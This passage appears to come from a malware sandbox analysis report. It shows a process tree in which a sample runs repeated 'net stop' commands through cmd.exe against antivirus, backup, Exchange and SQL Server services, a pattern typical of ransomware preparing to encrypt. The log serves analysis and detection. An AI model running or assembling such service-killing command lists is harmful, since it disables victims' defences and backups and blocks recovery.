    "C:\Windows\system32\cmd.exe" /C net stop "Sophos File Scanner Service" /y
    3⤵
    PID:1816
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos File Scanner Service" /y
      4⤵
      PID:1440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
        5⤵
        
        PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos Health Service" /y
    3⤵
    PID:1376
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos Health Service" /y
      4⤵
      PID:1172
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Health Service" /y
        5⤵
        
        PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos MCS Agent" /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos MCS Agent" /y
      4⤵
      PID:1620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
        5⤵
        
        PID:1196
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos MCS Client" /y
    3⤵
    PID:360
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos MCS Client" /y
      4⤵
      PID:1192
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Client" /y
        5⤵
        
        PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos Message Router" /y
    3⤵
    PID:1176
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos Message Router" /y
      4⤵
      PID:1092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Message Router" /y
        5⤵
        
        PID:320
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos Safestore Service" /y
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos Safestore Service" /y
      4⤵
      PID:1776
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
        5⤵
        
        PID:752
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos System Protection Service" /y
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos System Protection Service" /y
      4⤵
      PID:1464
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
        5⤵
        
        PID:856
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos Web Control Service" /y
    3⤵
    PID:1556
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos Web Control Service" /y
      4⤵
      PID:432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
        5⤵
        
        PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Symantec System Recovery" /y
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\net.exe
      net stop "Symantec System Recovery" /y
      4⤵
      PID:1768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Symantec System Recovery" /y
        5⤵
        
        PID:240
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:1340
  - - C:\Windows\SysWOW64\net.exe
      net stop "Veeam Backup Catalog Data Service" /y
      4⤵
      PID:1440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
        5⤵
        
        PID:568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Zoolz 2 Service" /y
    3⤵
    PID:1492
  - - C:\Windows\SysWOW64\net.exe
      net stop "Zoolz 2 Service" /y
      4⤵
      PID:1172
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
        5⤵
        
        PID:1376
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ARSM /y
    3⤵
    PID:1848
  - - C:\Windows\SysWOW64\net.exe
      net stop ARSM /y
      4⤵
      PID:1620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ARSM /y
        5⤵
        
        PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop AVP /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net.exe
      net stop AVP /y
      4⤵
      PID:1480
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AVP /y
        5⤵
        
        PID:560
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop AcrSch2Svc /y
    3⤵
    PID:472
  - - C:\Windows\SysWOW64\net.exe
      net stop AcrSch2Svc /y
      4⤵
      PID:1008
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        5⤵
        
        PID:840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop AcronisAgent /y
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\net.exe
      net stop AcronisAgent /y
      4⤵
      PID:1176
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AcronisAgent /y
        5⤵
        
        PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop Antivirus /y
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\net.exe
      net stop Antivirus /y
      4⤵
      PID:2044
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Antivirus /y
        5⤵
        
        PID:768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop BackupExecAgentAccelerator /y
    3⤵
    PID:872
  - - C:\Windows\SysWOW64\net.exe
      net stop BackupExecAgentAccelerator /y
      4⤵
      PID:616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        5⤵
        
        PID:856
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop BackupExecAgentBrowser /y
    3⤵
    PID:1464
  - - C:\Windows\SysWOW64\net.exe
      net stop BackupExecAgentBrowser /y
      4⤵
      PID:688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        5⤵
        
        PID:108
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop BackupExecDeviceMediaService /y
    3⤵
    PID:1112
  - - C:\Windows\SysWOW64\net.exe
      net stop BackupExecDeviceMediaService /y
      4⤵
      PID:1556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
        5⤵
        
        PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop BackupExecJobEngine /y
    3⤵
    PID:984
  - - C:\Windows\SysWOW64\net.exe
      net stop BackupExecJobEngine /y
      4⤵
      PID:1768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        5⤵
        
        PID:896
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop BackupExecManagementService /y
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\net.exe
      net stop BackupExecManagementService /y
      4⤵
      PID:568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        5⤵
        
        PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop BackupExecRPCService /y
    3⤵
    PID:1320
  - - C:\Windows\SysWOW64\net.exe
      net stop BackupExecRPCService /y
      4⤵
      PID:1780
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        5⤵
        
        PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop BackupExecVSSProvider /y
    3⤵
    PID:824
  - - C:\Windows\SysWOW64\net.exe
      net stop BackupExecVSSProvider /y
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        5⤵
        
        PID:364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop DCAgent /y
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\net.exe
      net stop DCAgent /y
      4⤵
      PID:1616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DCAgent /y
        5⤵
        
        PID:1148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop EPSecurityService /y
    3⤵
    PID:1192
  - - C:\Windows\SysWOW64\net.exe
      net stop EPSecurityService /y
      4⤵
      PID:1428
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EPSecurityService /y
        5⤵
        
        PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop EPUpdateService /y
    3⤵
    PID:1632
  - - C:\Windows\SysWOW64\net.exe
      net stop EPUpdateService /y
      4⤵
      PID:1276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EPUpdateService /y
        5⤵
        
        PID:472
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ESHASRV /y
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\net.exe
      net stop ESHASRV /y
      4⤵
      PID:280
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ESHASRV /y
        5⤵
        
        PID:564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop EhttpSrv /y
    3⤵
    PID:908
  - - C:\Windows\SysWOW64\net.exe
      net stop EhttpSrv /y
      4⤵
      PID:1684
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EhttpSrv /y
        5⤵
        
        PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop EraserSvc11710 /y
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\net.exe
      net stop EraserSvc11710 /y
      4⤵
      PID:872
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EraserSvc11710 /y
        5⤵
        
        PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop EsgShKernel /y
    3⤵
    PID:1744
  - - C:\Windows\SysWOW64\net.exe
      net stop EsgShKernel /y
      4⤵
      PID:1896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EsgShKernel /y
        5⤵
        
        PID:1464
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop FA_Scheduler /y
    3⤵
    PID:1300
  - - C:\Windows\SysWOW64\net.exe
      net stop FA_Scheduler /y
      4⤵
      PID:980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FA_Scheduler /y
        5⤵
        
        PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop IISAdmin /y
    3⤵
    PID:1032
  - - C:\Windows\SysWOW64\net.exe
      net stop IISAdmin /y
      4⤵
      PID:584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop IISAdmin /y
        5⤵
        
        PID:984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop IMAP4Svc /y
    3⤵
    PID:1164
  - - C:\Windows\SysWOW64\net.exe
      net stop IMAP4Svc /y
      4⤵
      PID:1100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop IMAP4Svc /y
        5⤵
        
        PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop KAVFS /y
    3⤵
    PID:1376
  - - C:\Windows\SysWOW64\net.exe
      net stop KAVFS /y
      4⤵
      PID:1220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KAVFS /y
        5⤵
        
        PID:1320
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop KAVFSGT /y
    3⤵
    PID:2028
  - - C:\Windows\SysWOW64\net.exe
      net stop KAVFSGT /y
      4⤵
      PID:576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KAVFSGT /y
        5⤵
        
        PID:824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MBAMService /y
    3⤵
    PID:1608
  - - C:\Windows\SysWOW64\net.exe
      net stop MBAMService /y
      4⤵
      PID:1620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MBAMService /y
        5⤵
        
        PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MBEndpointAgent /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net.exe
      net stop MBEndpointAgent /y
      4⤵
      PID:1156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MBEndpointAgent /y
        5⤵
        
        PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MMS /y
    3⤵
    PID:472
  - - C:\Windows\SysWOW64\net.exe
      net stop MMS /y
      4⤵
      PID:840
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MMS /y
        5⤵
        
        PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSExchangeES /y
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeES /y
      4⤵
      PID:1840
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeES /y
        5⤵
        
        PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSExchangeIS /y
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIS /y
      4⤵
      PID:768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS /y
        5⤵
        
        PID:616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSExchangeMGMT /y
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMGMT /y
      4⤵
      PID:856
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMGMT /y
        5⤵
        
        PID:688
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSExchangeMTA /y
    3⤵
    PID:1464
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMTA /y
      4⤵
      PID:108
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMTA /y
        5⤵
        
        PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSExchangeSA /y
    3⤵
    PID:1112
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeSA /y
      4⤵
      PID:1988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeSA /y
        5⤵
        
        PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSExchangeSRS /y
    3⤵
    PID:984
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeSRS /y
      4⤵
      PID:896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeSRS /y
        5⤵
        
        PID:568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSOLAP$SQL_2008 /y
    3⤵
    PID:1028
  - - C:\Windows\SysWOW64\net.exe
      net stop MSOLAP$SQL_2008 /y
      4⤵
      PID:1440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
        5⤵
        
        PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:1320
  - - C:\Windows\SysWOW64\net.exe
      net stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:1932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
        5⤵
        
        PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSOLAP$TPS /y
    3⤵
    PID:824
  - - C:\Windows\SysWOW64\net.exe
      net stop MSOLAP$TPS /y
      4⤵
      PID:1648
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$TPS /y
        5⤵
        
        PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSOLAP$TPSAMA /y
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\net.exe
      net stop MSOLAP$TPSAMA /y
      4⤵
      PID:1196
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
        5⤵
        
        PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$BKUPEXEC /y
    3⤵
    PID:1092
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$BKUPEXEC /y
      4⤵
      PID:1428
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
        5⤵
        
        PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$ECWDB2 /y
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$ECWDB2 /y
      4⤵
      PID:1276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
        5⤵
        
        PID:472
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:280
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
        5⤵
        
        PID:564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:1568
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:1684
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
        5⤵
        
        PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$PROD /y
    3⤵
    PID:432
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$PROD /y
      4⤵
      PID:872
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PROD /y
        5⤵
        
        PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:556
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:1896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
        5⤵
        
        PID:1464
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$SBSMONITORING /y
    3⤵
    PID:1244
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SBSMONITORING /y
      4⤵
      PID:980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
        5⤵
        
        PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$SHAREPOINT /y
    3⤵
    PID:1324
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SHAREPOINT /y
      4⤵
      PID:584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
        5⤵
        
        PID:984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$SOPHOS /y
    3⤵
    PID:1680
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SOPHOS /y
      4⤵
      PID:1100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
        5⤵
        
        PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:1584
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:1320
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
        5⤵
        
        PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$SQL_2008 /y
    3⤵
    PID:1480
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SQL_2008 /y
      4⤵
      PID:824
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
        5⤵
        
        PID:576
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:988
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:1692
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
        5⤵
        
        PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$TPS /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$TPS /y
      4⤵
      PID:1192
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$TPS /y
        5⤵
        
        PID:840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$TPSAMA /y
    3⤵
    PID:472
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$TPSAMA /y
      4⤵
      PID:2000
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
        5⤵
        
        PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:1076
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        5⤵
        
        PID:768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:1776
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        5⤵
        
        PID:856
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:1528
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
        5⤵
        
        PID:108
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher /y
    3⤵
    PID:1464
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher /y
      4⤵
      PID:1488
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher /y
        5⤵
        
        PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:1112
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:1768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
        5⤵
        
        PID:896
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:984
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:1140
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
        5⤵
        
        PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:1028
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:1436
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
        5⤵
        
        PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:1340
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
        5⤵
        
        PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:576
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:1172
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
        5⤵
        
        PID:1196
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:1620
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:1612
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
        5⤵
        
        PID:560
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:1008
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
        5⤵
        
        PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLSERVER /y
    3⤵
    PID:1840
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLSERVER /y
      4⤵
      PID:1640
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLSERVER /y
        5⤵
        
        PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLServerADHelper /y
    3⤵
    PID:768
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLServerADHelper /y
      4⤵
      PID:828
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper /y
        5⤵
        
        PID:752
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MSSQLServerADHelper100 /y
    3⤵
    PID:856
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLServerADHelper100 /y
      4⤵
      PID:616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
        5⤵
        
        PID:1536
- - C:\Windows\SysWOW64\cmd.exe
